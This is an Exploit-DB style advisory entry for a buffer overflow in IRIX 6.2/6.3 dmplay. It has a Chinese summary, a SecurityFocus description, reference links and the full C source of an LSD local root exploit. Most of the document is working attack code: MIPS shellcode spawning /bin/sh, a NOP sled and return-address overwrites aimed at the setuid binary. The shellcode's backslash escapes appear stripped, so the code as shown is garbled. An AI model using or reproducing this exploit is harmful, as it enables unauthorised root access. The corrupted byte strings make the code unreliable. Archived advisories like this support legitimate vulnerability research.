https://www.exploit-db.com/exploits/20128
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200010-041

IRIX6.2和6.3版本的dmplay存在缓冲区溢出漏洞。本地用户可以借助超长命令行选项获取根权限。

/*
source: http://www.securityfocus.com/bid/1528/info

Certain versions of IRIX ship with a version of dmplay which is vulnerable to a buffer overflow attack. The program, dmplay, is used to play movie files under IRIX. The problem at hand is the way the program handles the DISPLAY variable for the users X terminal. It does not check bounds and therefore is vulnerable to attack by an overly long user supplied string. 
*/

/*## copyright LAST STAGE OF DELIRIUM oct 1997 poland        *://lsd-pl.net/ #*/
/*## /usr/sbin/dmplay                                                        #*/

#define NOPNUM 800
#define ADRNUM 156
#define PCHNUM 148
#define TMPNUM 52

char shellcode[]=
    "x04x10xffxff"    /* bltzal  $zero,<shellcode>    */
    "x24x02x03xf3"    /* li      $v0,1011             */
    "x23xffx01x14"    /* addi    $ra,$ra,276          */
    "x23xe4xffx08"    /* addi    $a0,$ra,-248         */
    "x23xe5xffx10"    /* addi    $a1,$ra,-240         */
    "xafxe4xffx10"    /* sw      $a0,-240($ra)        */
    "xafxe0xffx14"    /* sw      $zero,-236($ra)      */
    "xa3xe0xffx0f"    /* sb      $zero,-241($ra)      */
    "x03xffxffxcc"    /* syscall                      */
    "/bin/sh"
;

char jump[]=
    "x03xa0x10x25"    /* move    $v0,$sp              */
    "x03xe0x00x08"    /* jr      $ra                  */
;

char nop[]="x24x0fx12x34";

main(int argc,char **argv){
    char buffer[10000],adr[4],pch[4],tmp[4],*b,*envp[2],display[128];
    int i;

    printf("copyright LAST STAGE OF DELIRIUM oct 1997 poland  //lsd-pl.net/n");
    printf("/usr/sbin/dmplay for irix 6.2 6.3 IP:17,19,20,21,22,32nn");

    if(argc!=3){
        printf("usage: %s {62|63} xserver:displayn",argv[0]);
        exit(-1);
    }

    if(!strcmp(argv[1],"62")){
        *((unsigned long*)adr)=(*(unsigned long(*)())jump)()+10396+32;
        *((unsigned long*)pch)=(*(unsigned long(*)())jump)()+10396+32+900+30540;
        *((unsigned long*)tmp)=(*(unsigned long(*)())jump)()+10396+32+8000;
    }
    if(!strcmp(argv[1],"63")){
        *((unsigned long*)adr)=(*(unsigned long(*)())jump)()+10348+32;
        *((unsigned long*)pch)=(*(unsigned long(*)())jump)()+10348+32+900-84;
        *((unsigned long*)tmp)=(*(unsigned long(*)())jump)()+10348+32+8000;
    }

    sprintf(display,"DISPLAY=%s",argv[2]);
    envp[0]=display;
    envp[1]=0;

    b=buffer;
    for(i=0;i<NOPNUM;i++) *b++=nop[i%4];
    for(i=0;i<strlen(shellcode);i++) *b++=shellcode[i];
    *b++=0xff;
    for(i=0;i<ADRNUM;i++) *b++=adr[i%4];
    for(i=0;i<TMPNUM;i++) *b++=tmp[i%4];
    for(i=0;i<PCHNUM;i++) *b++=pch[i%4];
    *b=0;

    execle("/usr/sbin/dmplay","lsd",buffer,0,envp);
}

来源:BUGTRAQ
名称:20000802[LSD]someunpublishedLSDexploitcodes
链接:http://www.securityfocus.com/templates/archive.pike?list=1&msg;[email protected]
来源:BID
名称:1528
链接:http://www.securityfocus.com/bid/1528
来源:XF
名称:irix-dmplay-bo(5064)
链接:http://xforce.iss.net/static/5064.php
来源:OSVDB
名称:1484
链接:http://www.osvdb.org/1484